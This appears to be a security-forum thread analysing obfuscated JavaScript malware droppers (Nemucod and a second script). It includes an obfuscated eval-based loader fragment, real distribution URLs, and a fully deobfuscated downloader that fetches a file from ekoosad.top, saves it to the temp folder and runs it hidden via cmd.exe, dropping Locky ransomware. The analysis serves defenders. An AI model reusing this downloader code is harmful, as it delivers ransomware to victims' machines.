"__Dr", "__Ig", "__VKf", "__Dr", "__Nw", "__EMm", "__Gl", "__CJk", "__Id", "__Xe", "__GVj", "__Yw", "__Qf", "__QKo", "__NDw", "__XHb", "__Zs", "__Ss", "__Qv", "__Ss", "__ZQn", "__NDw", "__Nw", "__Ss", "__Qv", "__Ss", "__Ac", "__VKf", "__Nu", "__Gl", "__Ji0", "__XHb", "__Us", "__Qz", "__DOv", "__DOv", "__ZMl", "__CPs", "__Sa", "__Te", "__EAw", "__CPs", "__Sa", "__Te", "__CPs", "__Sa", "__Te", "__GOn", "__Yw", "__ALu", "__Dh", "__SUa", "__Dr", "__QKo", "__SUa", "__Dr", "__Qv0", "__Nu", "__Gl", "__EWd", "__EWd", "__DOv", "__ZMl", "__CPs", "__Sa", "__Te", "__CPs", "__Sa", "__Te", "__Xe", "__FWb", "__Id", "__Dr", "__Xe", "__Yw", "__Ss", "__GOn", "__Yw", "__ALu", "__ZMl", "__CPs", "__Sa", "__EAw", "__ZMl", "__CPs", "__Sa", "__CPs", "__Sa"
];

var HKc = "";
var Bv = {
"__Sa": (1, "\x0a"),
"__CPs": (1, "\x0d"),
"__DMb": (1, "D"),
"__Vf": (1, "H"),
"__XOq": (1, "L"),
"__Ac": (1, "P"),
"__XRb": (1, "T"),
"__EZe": (1, "X"),
"__Te": (1, "\x09"),
"__EFn": (1, "d"),
"__EMm": (1, "h"),
"__Dt": (1, "l"),
"__VKf": (1, "p"),
"__Id": (1, "t"),
"__EAw": (1, "\x7d"),
"__TLw": (1, "\x7c"),
"__KJn": (1, "\x7b"),
"__MKt": (1, "\x2f"),
"__Uv": (1, "\x2d"),
"__Ig": (1, "\x2e"),
"__Qv": (1, "\x2b"),
"__Jy": (1, "\x2c"),
"__BOo": (1, "\x2a"),
"__ITb": (1, "C"),
"__GOn": (1, "G"),
"__Ja": (1, "K"),
"__NDw": (1, "O"),
"__CJk": (1, "S"),
"__Gk": (1, "\x25"),
"__EWd": (1, "\x22"),
"__Xm": (1, "W"),
"__Us": (1, "x"),
"__Gl": (1, "\x28"),
"__DOv": (1, "\x29"),
"__Zs": (1, "c"),
"__Qf": (1, "g"),
"__VTv": (1, "k"),
"__LGq": (1, "o"),
"__Nw": (1, "s"),
"__NWq": (1, "w"),
"__Ss": (1, "\x20"),
"__Wv": (1, "\x21"),
"__Qv0": (1, "\x31"),
"__OOi": (1, "\x30"),
"__Qz": (1, "\x33"),
"__ALu": (1, "\x32"),
"__VKn": (1, "\x35"),
"__Vq": (1, "\x34"),
"__QMt": (1, "\x37"),
"__TGp": (1, "\x36"),
"__USc": (1, "\x39"),
"__Ji": (1, "\x38"),
"__OVr": (1, "\x3a"),
"__JLr": (1, "\x3c"),
"__ZMl": (1, "\x3b"),
"__If": (1, "\x3e"),
"__Dh": (1, "\x3d"),
"__IBi": (1, "F"),
"__Lp": (1, "J"),
"__ZQn": (1, "N"),
"__AHd": (1, "R"),
"__SUa": (1, "V"),
"__Qz0": (1, "Z"),
"__GYd": (1, "b"),
"__KVw": (1, "\x40"),
"__Lz": (1, "f"),
"__QMz": (1, "j"),
"__Yw": (1, "n"),
"__Xe": (1, "r"),
"__KYm": (1, "v"),
"__GNi": (1, "z"),
"__XHb": (1, "B"),
"__Dr": (1, "u"),
"__FMq": (1, "A"),
"__Bu": (1, "E"),
"__Ji0": (1, "I"),
"__Zb": (1, "M"),
"__ZBl": (1, "Q"),
"__EXd": (1, "U"),
"__CAb": (1, "Y"),
"__Zc": (1, "a"),
"__FWb": (1, "e"),
"__GVj": (1, "i"),
"__PUe": (1, "m"),
"__UGt": (1, "q"),
"__EHy": (1, "\x5f"),
"__At": (1, "\x5e"),
"__Nu": (1, "\x5d"),
"__Ee": (1, "\x5c"),
"__QKo": (1, "\x5b"),
"__Ts": (1, "y")
};
var Wy;
for (Wy = 0; Wy < PWf["l" + "e" + "n" + "gth"]; Wy++) {

XMm = PWf[Wy];

HKc = (43, 35, HKc) + (25, 35, Bv[XMm]);

}
eval(HKc);
</script>
</job>

2) Explanations :

As an html file, we can see some parts not present on first sample analyzed :

just present to allows the execution with good interpreter

The other part looks like the first sample, but less complicated :
=> the first tab no need the split function to obtain a tab of "keys" : it is directly done.

For the rest , same explanation :

for (Wy = 0; Wy < PWf["l" + "e" + "n" + "gth"]; Wy++) {

XMm = PWf[Wy];
HKc = ~~(43, 35,~~ HKc) + ~~(25, 35,~~ Bv[XMm]);
=> HKc = HKc + Bv[XMm];

}

eval(HKc); => evaluate the HKc string, result of first deobfuscation

3) What it looks like after first deobfuscation :

It looks like the same as previous sample, with some parts that change :

- var Uw = [21692, 4331, 983];
=> main tab used with different values (normal, for the XOR part, another number is used, not 118)

- URLs parts

- Payload Parts

4) Important parts :

4-1) Connection :

var Zm6 = [LCo + Bp + Ty0 + IVz + Jm1, Mu + EMb + OJe1 + Yu8 + Sz9 + Nq0 + DFe5];

for (var OPr3 = 0; OPr3 < Zm6[ZJb + Av]; OPr3++) {
try {

var Ma6 = WScript[MOq + Lf4 + Xf0](Zm6[OPr3]);
break;

} catch (e) {
continue;
}

};

We have to replace the vars with its contents to better understand

var Zm6 = [ "MSXML2.XMLHTTP","WinHttp.WinHttpRequest.5.1"]

=> one of this methods used for connection (first available)

var Ma6 = WScript["CreateObject"](Zm6[index]);

4-2) URLs

var TIk = [

Ed + Zw0 + KTl3 + KFg2 + Rq + KFg2 + Gd5 + FQs + Gn4 + Wt4 + Mo + XSj3 + Mo0 + Sa,
Ed + RAn + Ze1 + Rj + Hj + Za2 + Vq + Wk + Ke + JPy + Vu0 + ROp2,
Ed + Zw0 + Bl4 + GBr2 + AZc + Xz7 + AYc8 + XSq6 + EDr2 + EXd + Oa9 + Vp + Gy50,
Ze + VQk + Rj + Hj + Ag + Oz0 + XSq6 + BYp2 + Gb + Vu0 + ROp2,
Ed + Zw0 + Uu7 + GPw + FOx8 + AUi + OPo + LTv + NGu8 + XNe + Kz9 + Dc

];

With replacements :

http ://lookbookinghotels.ws/fnectl9i
http ://one4four1.ws/lt94ccs
http ://trybttr.ws/vygvb3zm
http ://one4four1.ws/lt94ccs
http ://one4four1.ws/lt94ccs (still twice the same urls ... bug !?)

4-3) Payload

var Io = MTm6.ExpandEnvironmentStrings(En2 + QNu);
var Lp9 = Io + IBm7 + Dc0 + FAt8 + IZr;
var IVi2 = Lp9 + En7 + QBp;

Io = MTm6.ExpandEnvironmentStrings(En2 + QNu)

En2 + QNu = "%TEMP%/"

var MTm6 = WScript[MOq + Lf4 + Xf0](LSk + Fk + OHb + PVg7 + Tp7);

MOq + Lf4 + Xf0 = "CreateObject"
LSk + Fk + OHb + PVg7 + Tp7 = "WScript.Shell"

=> MTm6 = WScript.CreateObject("WScript.Shell")

IBm7 + Dc0 + FAt8 + IZr = "WKeKTuYpXoXjHaWZ"
En7 + QBp = ".dll"

=> var IVi2 = '%TEMP%WKeKTuYpXoXjHaWZ'.dll"

it uses the short path used by programs that require the earlier 8.3 file naming convention.

var Uv = fso.GetFile(IVi2);
var Lj4 = Uv.ShortPath;

=> WKEKTU~1.DLL

run => rundll32.exe %TEMP%\WKEKTU.DL,qwerty 323

qwerty => function called
323 => parameter

New Locky ransomware as dll

5) Main Loop :

No changes

6) False random function :

function random(range, s) {

s[0] = 171 * s[-6915 + 6915] % 30269;
s[1] = (5745 - 5573) * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[4353 - 4352] / 30307 + s[2] / 30323) % 1.0;
return Math[OMi0 + Ao4](r * range);

}

Simplified :
function random(range, s) {

s[0] = 171 * s[0] % 30269;
s[1] = 172 * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[1] / 30307 + s[2] / 30323) % 1.0;
return Math.floor(r * range);

}

var Fm;

var AJf = Uw.slice();
=> [21692, 4331, 983] => s[0] , s[1] and s[2]

=> same random function
=> different values from previous sample for second parameter
=> different integer for the XOR part

for (var OPr3 = 6780 - 6780; OPr3 < IGv7[ICc + Rb]; OPr3++) {

IGv7[OPr3] ^= random(256, AJf);

}

=> random(256, AJf) = 256 all the time

----------------------------------------------------------------------------------------------------
NEXT PART : 2 .js : completely different script, not a nemucod
----------------------------------------------------------------------------------------------------

DardiM · Oct 4, 2016

Part 3 : 2.js

1) What it looks like when edited

As usual : I made some modifications to avoid copy-paste => saved => run => infection

2) Explanation of the obfuscation method :

The important part is in the try...catch

All the functions and vars before this part are used to hide the real functions, url, etc..

Using concatenation of string by calling functions, using arrays of string with a mix of useless and useful string values, it makes harder to understand what the script does.

Look at the more important part :

try {

var ygjijzigz8 = emavor;
if (!ygjijzigz8[wjucyfas8() + aqemwe2() + mzedjyl() + untyqu9[3] + pgecobo5[2]][nhepo8() + ossimqe8() + ykible[2]][jtoxri3[1] + ryjetky[0]]) {

var lyvpuf4 = eval(obovgenb() + picqex[0] + yrat7[4] + pwymujohm[1] + nedidot0[1]);

}
var udluw = tamru0() + ixmyme7[0] + ojaqo[1] + mryfcupb[1] + ozmivlade();
var nahybixfo5 = ygjijzigz8[gdihuxtih6()];
var zusedzary0 = irqyzp4[3] + dqicdakv() + axpiss[4] + upbohykre() + fbomorc5[0] + kbukeqqown2() + ytax9() + yjarubh[7] + taca3() + axyhyz9() + upyqo() + twopbymo5[3];
var ywfuwom1 = vsali6[0] + etgydy[3] + yccejihk() + ogodi() + vutu7[6] + dowqi6() + ygiqxi();
var hibsos = new lyvpuf4(udluw);
var ogyc6 = awdycfis() + ototmu8() + umjukliqdy7() + yvyc();
var exobvy8 = new lyvpuf4(ywfuwom1);
hibsos[ilabqe()](ewdexsy5[3], zusedzary0, dxyqwab3[6] - 392);
var ezus = new lyvpuf4(ogyc6);
ezus[yrpyvmy9()]();
ezus[opraw()] = opikomg1[0] - sulbulvy1[4];
var ykxupuwx = ylnurvagr3[4] + arqacha8() + occuza[2] + sviniv3() + cesegumk[1] + mtesqamygl8() + vfebupa8[6];
hibsos[cubqog0()]();
var wiroxywsy6 = exobvy8[zkyketxiz0()](rvotok9[0] - exednycmu4[1]) + yzkezu[0] + exobvy8[aqyl()]();
var catongo = jpuqnoxg() + biltaloj[0] + mjykjujej[1] + rufolly() + wiroxywsy6;
ezus[rompyqh()] = qkusaza[5] - 838;
var ygewx = new lyvpuf4(ykxupuwx);
if (hibsos[amalxudx3()] == aflirvir1[0] - uqyte0[0]) {

ezus[dfejy1()](hibsos[uhqer1()]);
ezus[alevrur1()](wiroxywsy6);
ezus[kwobo()]();
ygewx[axtexik5()](catongo, dxyqwab3[6] - 392);

}

} catch (thumrobo) {}

Some examples :

var ygjijzigz8 = emavor;

=> var emavor = [WScript, "yjmitsyhn", "ohxonv", "94855"][0];
=> var emavor = [WScript, ~~"yjmitsyhn~~", ~~"ohxonv"~~, ~~"94855"~~][0];
=> emavor = WScript object

The same way, beginning from the try...catch part, we just have to replace the functions by returned data and vars / arrays with the good strings.

wjucyfas8() + aqemwe2() + mzedjyl() + untyqu9[3] + pgecobo5[2]

"Ar" + "gu" + "me" + "nt" + "s"
=> "Arguments"

nhepo8() + ossimqe8() + ykible[2]

"Na" + "me" + ""d"
=> "Named"

jtoxri3[1] + ryjetky[0]

"len" + "gth"
=> length

A last example :

ezus[yrpyvmy9()]();

Let's find yrpyvmy9()

function yrpyvmy9() {

var kwatsyf = [];
kwatsyf["tboramy"] = azdyvurc4[0] + uwtiq8[1];
kwatsyf["yqubqulp"] = 'xnujoka';
kwatsyf["ugodr"] = 'nigywr';
kwatsyf["epuxyxfu"] = 'enykhi';
kwatsyf["hmihrag"] = 'wybolvy';

return kwatsyf["tboramy"];

}

it returns kwatsyf["tboramy"];

=> kwatsyf["tboramy"] = azdyvurc4[0] + uwtiq8[1];

=> azdyvurc4[0] + uwtiq8[1];

var azdyvurc4 = ['Op', "ugidu", "22792", "52245", "rvafwinle", "55932", "72416", "lhysa"];

var uwtiq8 = ["31226", 'en', "73707", "23428", "55818", "14746", "cahwoq", "30285", "89537", "12574"];

=> yrpyvmy9() = "Open";

Etc,...

3) Deobfuscation :

try {

var ygjijzigz8 = WScript;
if (!WScript["Arguments"]["Named"]["Length"]) {

var lyvpuf4 = eval("ActiveXObject");
=> here the eval allows to transform the string on an ActiveXObject object

}
var udluw ="MSXML2.XMLHTTP";
var nahybixfo5 = WScript["ScriptfullName"];
var zusedzary0 ="http ://ekoosad.top/admin.php?f=400";
var ywfuwom1 ="Scripting.FileSystemObject";
var hibsos = new ActiveXObject("MSXML2.XMLHTTP"); => http object
var ogyc6 = "ADODB.Stream";
var exobvy8 = new ActiveXObject("Scripting.FileSystemObject");
hibsos["Open"]("GET", zusedzary0, 0 ); => "http ://ekoosad.top/admin.php?f=400";
var ezus = new ActiveXObject("ADODB.Stream");
ezus["Open"]();
ezus["Type"] =1;
var ykxupuwx ="WScript.Shell";
hibsos["send"](); => request done !
var wiroxywsy6 = exobvy8["GetSpecialFolder"](2) + "\\" + exobvy8["GetTempName"]();
var catongo ="cmd.exe /c " + wiroxywsy6;
ezus["Position"] = 0;
var ygewx = new ActiveXObject("WScript.Shell");
if (hibsos["Status"] == 200) {

ezus["Write"](hibsos["ResponseBody"]);
ezus["saveToFile"](wiroxywsy6);
ezus["Close"]();
ygewx["run"()](catongo,0);

}

} catch (thumrobo) {}

More understandable :

try {

var objWScript= WScript;

if (! WScript.Arguments.Named.Length) {

var objActiveXObject= eval("ActiveXObject");

}

var url ="http ://ekoosad.top/admin.php?f=400";
var http ="MSXML2.XMLHTTP";
var shell="WScript.Shell";
var stream = "ADODB.Stream";
var fso ="Scripting.FileSystemObject";

var script_path = WScript.ScriptfullName; => not used !!???

var obj_Http= new ActiveXObject("MSXML2.XMLHTTP");
var obj_FileSystemObject= new ActiveXObject("Scripting.FileSystemObject");

var obj_Stream = new ActiveXObject("ADODB.Stream");
obj_Stream.Open();
obj_Stream.Type =1;

obj_Http.Open("GET", url, 0 ); => "http ://ekoosad.top/admin.php?f=400";
obj_Http.send(); => request done !

var path = obj_FileSystemObject.GetSpecialFolder(2) + "\\" + obj_FileSystemObject.GetTempName();

var execute ="cmd.exe /c " + path;

obj_Stream.Position = 0;

var obj_shell = new ActiveXObject("WScript.Shell");

if (obj_Http.Status == 200) {

obj_Stream.Write(obj_Http.ResponseBody);
obj_Stream.saveToFile(path);
obj_Stream.Close();
obj_shell.run(execute,0);

}

} catch (exception) {}

4) Explanation :

A file is downloaded from http ://ekoosad.top/admin.php?f=400
and saved to : %temp%\RandomName (example : %temp%\radBACD3.tmp)
then it is run with cmd.exe /c

See here for more details
https://malwaretips.com/threads/quick-analysis-of-obfuscated-wanda-js-js-locky-m3-eldorado.62394/

Search

Malware Analysis Deobfuscation of script samples from MV 13-9-16 #4 (nemucod and cie)

DardiM

Level 26

DardiM

Level 26

DardiM

Level 26

Similar threads